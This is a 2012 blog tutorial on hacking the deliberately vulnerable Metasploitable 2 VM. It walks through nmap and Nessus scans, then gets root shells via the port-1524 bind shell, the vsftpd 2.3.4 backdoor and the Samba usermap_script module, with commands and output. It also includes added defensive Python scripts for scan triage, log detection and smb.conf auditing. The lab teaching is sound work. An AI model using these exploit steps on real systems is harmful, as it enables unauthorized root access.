
Sunday, October 7, 2012


[GUIDE]Hacking Metasploitable/Remote Exploitation[GUIDE]

#Hacking Metasploitable2- Remote Exploitation



Hello, and welcome to my guide on hacking Metasploitable 2. My name is Lunch Box, formerly known as shadowman64, and I will be your instructor today. What will you be learning today? Let's take a look-

-->Installing VMware
-->Installing Metasploitable2
-->Scanning The Target with Nmap
-->Vulnerability Scanning with Nessus
-->Exploiting the target with Metasploit


For this guide, I will be using BackTrack 5. I suggest you go download and install it at http://www.backtrack-linux.org/

Next, we will need a target computer (if you prefer to call this a "host", "box" or "machine", feel free to do so. :) )
Now here comes the obvious question- what if I don't have another computer to use as a target host? VMware.

----------------------------------------------------------------------------------------------
Installing VMware

VMware is a virtualization software product designed to run virtual hosts (their operating systems, to be specific). We will be using the free version of this software, VMware Player.
Navigate to this URL:


Code:
http://www.vmware.com/products/player/overview.html

Click the blue "Download" button. You will be directed to a web page that has several files for this software. Since I am using 32-bit Linux, I downloaded my corresponding file (VMware-Player-5.0.0-812388.i386.bundle).

Once the file is downloaded, navigate to the directory you downloaded the file into. We need to make the file executable, so once you are in the correct directory, type-

Code:
chmod +x <filename.bundle>

Then, type-

Code:
./<filename.bundle>

You will then be guided through the installer. Now that we have VMware, let's move on to the operating system we will be using inside of it.

----------------------------------------------------------------------------------------------
Installing Metasploitable2

Metasploitable2 is the sequel to Metasploitable, an intentionally vulnerable operating system. With tons of vulnerable and misconfigured services plus a web server with several vulnerable web applications, this insecure Linux distribution is a must-have for any penetration testing lab, and a wonderful practice environment.

Navigate to
Code:
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
to download Metasploitable2.

Download the .zip file. Navigate to the directory you downloaded it into in Terminal, just like we did with VMware. Then type-

Code:
unzip metasploitable-linux-2.0.0.zip

Now that the file is unzipped, open up your file manager (for me it would be Dolphin) and double-click on the .vmx file, which will open right up in VMware.
For a realistic external host, use bridged networking, which you can find under Virtual Machine Settings. You can have a private little network with the target host by using Host-Only networking. I would explain networking in a little more detail, but if you are learning penetration testing you should have a good foundation of knowledge regarding networking (the OSI Model, TCP/IP, network topology, switches, hubs, etc.)

Now go ahead and fire up Metasploitable2 in VMware. The operating system will load in the VMware window, and eventually you will be prompted with a login dialogue. Click inside the window to send input to VMware, and press Ctrl-Alt to release the mouse and keyboard back to your own desktop. Log in with the default credentials (username msfadmin, password msfadmin). Once you are logged in, press Ctrl-Alt. We need not do anything else with Metasploitable2, as all of its network services are already listening for connections.

Firstly, let's figure out the IP address of the target. We could eventually work this out by scanning the whole subnet, a block of 254 IP addresses (the size of the block depends on the IP class; here it is Class C), then OS fingerprinting and finally service scanning. But let's just type "ifconfig" inside the VMware window to find the address of our vulnerable box.

My target IP address is 192.168.0.18

Now let's get down to business. Open a Terminal window if you have not already.
----------------------------------------------------------------------------------------------
Gathering Information with Nmap

First, as I mentioned earlier, we can't hack anything if we have no targets, so let's confirm the host is reachable. There are several tools to do this-

Code:
nmap -sn 192.168.0.18

Code:
ping 192.168.0.18

Code:
fping 192.168.0.18

You get the point. Personally, if we are pinging a single host, I prefer fping. The output is simple and to the point. However, if we were scanning an entire subnet, I would definitely go with nmap-

Code:
nmap -sn 192.168.0.0/24

This will scan the entire subnet for hosts that are simply alive, nothing more, nothing less. :)

So, judging from the output of whatever command you ran to determine whether the host is alive or not, it should be alive. If you have an issue sending or receiving packets over the network to the target, here are some tips to troubleshoot-

-->Make sure the target IP is correct.
-->If you are using a bridged adapter, the target host is going to replicate the physical connection to the network. Be sure you are still connected to the network.

Let's see what operating system the target is running by using the -O switch in nmap-

Code:
nmap -O 192.168.0.18


Your output should look something like this-


Code:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-10-04 01:16 EDT
Nmap scan report for 192.168.0.18
Host is up (0.00049s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:63:64:6C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds

Ok, I don't know about you, but I'm pretty sure this host is running Linux. As you can see, there are many services running on this target.

We should get the actual version information for these services, and see exactly what is running on these open ports-

Code:
nmap -sV 192.168.0.18

Your output should look something like so-

Code:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-10-04 01:20 EDT
Nmap scan report for 192.168.0.18
Host is up (0.0014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  ingreslock?
2049/tcp open  rpcbind
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

So what do we know so far? Basically, we have a bunch of open ports with a bunch of services running on them. There are many more information gathering, fingerprinting and footprinting methods, but I will not go over them in detail here; there will be a dedicated tutorial on information gathering at a later time. Nevertheless, let's move on to vulnerability scanning.
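As an added triage example (not part of the original guide), this Python script parses the nmap -sV table above and flags the services this guide goes on to exploit, so a defender reviewing the same scan sees where to look first; the sample output is a constructed subset of the lines above and the rule table is my own.

```python
import re
from dataclasses import dataclass
# Constructed sample: a subset of the nmap -sV lines from this guide, embedded
# so the script runs offline against realistic input.
NMAP_SV_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
23/tcp   open  telnet      Linux telnetd
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
1524/tcp open  ingreslock?
5900/tcp open  vnc         VNC (protocol 3.3)
"""

# port/proto  state  service  [version]; nmap appends '?' to a service name
# it could not verify, and omits VERSION when it has nothing to report.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str  # empty when nmap printed no VERSION column

def parse_nmap_sv(text):
    """Turn nmap's PORT/STATE/SERVICE/VERSION table into Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:  # banner, header and summary lines do not match
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name.rstrip("?"),
                                    (version or "").strip()))
    return services

# Triage rules: the findings this guide walks through plus well-known
# cleartext legacy services (constructed for this example, not a Nessus feed).
RISK_RULES = [
    (lambda s: s.port == 1524, "listening shell on 1524/tcp (wild_shell)"),
    (lambda s: s.version.startswith("vsftpd 2.3.4"), "backdoored vsftpd build"),
    (lambda s: s.version.startswith("Samba"), "check smb.conf 'username map script'"),
    (lambda s: s.name in {"telnet", "exec", "login", "shell"}, "cleartext legacy service"),
]

def triage(services):
    return [(s.port, reason) for s in services if s.state == "open"
            for match, reason in RISK_RULES if match(s)]
```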

----------------------------------------------------------------------------------------------
Vulnerability Scanning with Nessus

To scan this host for vulnerabilities, I am going to use my favorite vulnerability scanner, Nessus. Nessus, in reality, is much more than just a vulnerability scanner. Rather, it can be thought of as a framework, with a ton of various plug-ins for different types of scanning. Nessus does not come installed by default in my OS, and even though I already have it, just for the sake of learning I will show you how to install it.

Go to

Code:
http://www.tenable.com/products/nessus/select-your-operating-system

Agree to the terms and conditions, and then choose the file that's right for your OS. I chose the 32-bit .deb file. Once downloaded, navigate to the directory you downloaded the file in and run dpkg-

Code:
dpkg -i <file>

From there, the package will be installed. We cannot run Nessus without the plug-ins, however, and we must obtain an activation code to get them. Go to-

Code:
http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed

Provide your first and last name and a valid email address (this is the address the activation code will be sent to). Once you have the code, run the following command-

Code:
/opt/nessus/bin/nessus-fetch --register <activation code>

where <activation code> is the code provided in your email to activate your plug-ins.

Then add a user-

Code:
/opt/nessus/sbin/nessus-adduser

After running the above command, enter the username and password you want for your Nessus user account when prompted.

Now we can start our Nessus service-

Code:
/etc/init.d/nessusd start

This command will start the Nessus server. Wait a little while, because all the plug-ins need to be loaded; the service will then be listening at-

Code:
https://127.0.0.1:8834/

Once the service is started and you navigate to the above URL in your web browser, log in with the credentials you provided when you created your user account.

Now we can run our new scan. Click on the "Scans" tab, then click the "Add" button. You will find a small menu to enter all of your scan settings. Under "Name", I will put Metasploitable. Under Type I left the default option "Run Now". My Scan Policy was an "Internal Network Scan", and my Scan Targets was just one line- 192.168.0.18
As you can see, you could also provide a file with a list of hosts to scan. From here, we launch the scan and wait.
If you are wondering why we chose an Internal Network Scan as our policy, think about it for a second. We are not outside the network, we are inside it; that is what our network connection gives us. We are not hacking web applications (not yet), and we are not preparing for an audit. We want an internal scan because we are scanning hosts inside, or on, the network, you see?

Did you also know you can edit your policies? For instance, we can change the settings of our policy "Internal Network Scan" by clicking the Policies tab and then double clicking "Internal Network Scan".

Now that our scan is finished, let's have a look at some of the vulnerabilities Nessus has discovered.

According to the scan report, we have 8 critical vulnerabilities. Let's take a look at one I find very interesting and quite disturbing, as it would be a fatal error on any network administrator's part.
----------------------------------------------------------------------------------------------
Exploitation

1--> wild_shell

Look for Plugin ID 51988 and click on it to read more about the vulnerability. Apparently there is a service named wild_shell running on port 1524/tcp of our host. The description is pretty self explanatory. We have a listening shell on our target system waiting for a remote connection from us. Let's try it-

Code:
netcat -vv 192.168.0.18 1524

And that's all she wrote. We now have a remote command shell on the target with root privileges. Is that the only way to exploit this box? Hell no, let's look at some other ways.

2--> Smiley Face Backdoor

Now this one is interesting. The remote FTP server that is running on our target host was compiled with a backdoor. When attempting to login to the server with :) (a smiley face) as a username, the backdoor is triggered and listens for a connection on port 6200/tcp. After the client connects and then disconnects from the backdoor, the shell will stop listening for a connection.

Looking further into the Nessus output, we can see that this vulnerability is exploitable with Metasploit, particularly the VSFTPD v2.3.4 Backdoor Command Execution exploit. Let's run it-

Code:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.0.18
exploit

Here is our output-

Code:
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.

We were told to specify the password because we didn't actually give one; the exploit simply passes a smiley face [ :) ] to the FTP server as a username to trigger the backdoor. Now we need a TCP/IP tool like netcat to connect to our listening shell-

Code:
netcat -vv 192.168.0.18 6200

Here is my output-

Code:
192.168.0.18: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.0.18] 6200 (?) open

And there we are. We now have a remote shell on the server yet again, and with root privileges. But I'm not nearly finished with Metasploitable 2, because we still have to exploit Samba. :)
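From the defender's side, here is an added example (not from the original guide) of detecting the trigger described above in FTP logs: it flags any USER command whose argument contains ":)", which covers both the bare smiley the guide uses and a smiley embedded in a longer username; the log lines are constructed in the style of vsftpd's log_ftp_protocol output, and that format is an assumption.

```python
import re

# Constructed sample lines in the style of vsftpd's log_ftp_protocol output
# (format assumed). Two of the USER commands carry the backdoor trigger.
FTP_LOG = """\
Thu Oct  4 01:18:02 2012 [pid 5101] CONNECT: Client "192.168.0.5"
Thu Oct  4 01:18:03 2012 [pid 5101] FTP command: Client "192.168.0.5", "USER msfadmin"
Thu Oct  4 01:20:12 2012 [pid 5123] CONNECT: Client "192.168.0.9"
Thu Oct  4 01:20:12 2012 [pid 5123] FTP command: Client "192.168.0.9", "USER :)"
Thu Oct  4 01:20:13 2012 [pid 5123] FTP response: Client "192.168.0.9", "331 Please specify the password."
Thu Oct  4 01:25:40 2012 [pid 5140] FTP command: Client "192.168.0.12", "USER bob:)"
"""

# timestamp [pid N] FTP command: Client "ip", "USER name"
USER_CMD = re.compile(
    r'^(?P<ts>.+?) \[pid \d+\] FTP command: Client "(?P<client>[^"]+)", "USER (?P<user>.*)"$')

def backdoor_trigger_events(log_text):
    """Return (timestamp, client, username) for every USER command whose
    argument contains the ':)' byte pair that arms the vsftpd 2.3.4 backdoor.
    A substring match is used because the trigger works anywhere in the name."""
    events = []
    for line in log_text.splitlines():
        m = USER_CMD.match(line)
        if m and ":)" in m.group("user"):
            events.append((m.group("ts"), m.group("client"), m.group("user")))
    return events
```

Any hit is worth pairing with a check of whether 6200/tcp is now listening on the host, since that is the second symptom the guide describes.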

3--> Samba MS-RPC Request Heap Overflow

From the output we read in Nessus, it seems as though the version of Samba installed on the remote host is affected by multiple heap overflow vulnerabilities. However, if you have ever played around with Metasploit and have pentested a Linux box, you probably have heard of the samba usermap script vulnerability. According to the information about the exploit, it affects versions 3.0.20 through 3.0.25rc3 of Samba. A quick nmap scan can tell us what version Metasploitable2 is running-

Code:
nmap -sV 192.168.0.18 -p 445

Generally, usermap_script is not enabled by default in Samba. If you want to actually see the configuration of the Samba server, go into your Metasploitable virtual machine and type-

Code:
cd /etc/samba

From here type-

Code:
nano smb.conf

Scroll down with your down arrow through the terminal window, and you will more than likely find this line-

Code:
username map script = /etc/samba/scripts/mapusers.sh

This confirms our suspicion that Samba is using a username map script, since a script path is provided as the value of the "username map script" setting.
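To make the smb.conf check above repeatable, here is an added audit script (example code, not from the guide) that parses the file the way Samba reads parameter names, ignoring case and whitespace, so a differently spaced "username map script" line is not missed by a plain grep; the two config fragments are constructed, the weak one around the line found above and the hardened one with it commented out.

```python
import re

# Constructed smb.conf fragments: the first carries the setting this guide
# finds on Metasploitable2, the second is the hardened form with it disabled.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user
   ; username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""

def parse_smb_conf(text):
    """Return {section: {key: value}} with keys normalized the way Samba
    matches parameter names: case and internal whitespace are ignored, so
    'UserName Map Script' is the same key as 'username map script'."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue  # blank or comment line
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections

def usermap_script_findings(text):
    """List (section, script) for every section that sets a username map script."""
    return [(section, params["usernamemapscript"])
            for section, params in parse_smb_conf(text).items()
            if params.get("usernamemapscript")]
```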

Now we can run our exploit against it-

Code:
use exploit/multi/samba/usermap_script
set RHOST 192.168.0.18
set RPORT 445
exploit

Here is the output-

Code:
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo UbncLf1kk7mNDQ5k;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "UbncLf1kk7mNDQ5k\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.0.9:4444 -> 192.168.0.18:58504) at 2012-10-04 18:21:30 -0400

There you have it. Again, we have a root shell on the remote host.

Now, at this point you get the gist of gathering information, scanning the target for vulnerabilities, and exploiting it. Judging from the output of your Nessus scan, there are still several other critical vulnerabilities, plus the high level and medium level ones. And that's not all there is to Metasploitable2: there are still some web applications ready to hack, so stay tuned for Part 2 of this guide. :)
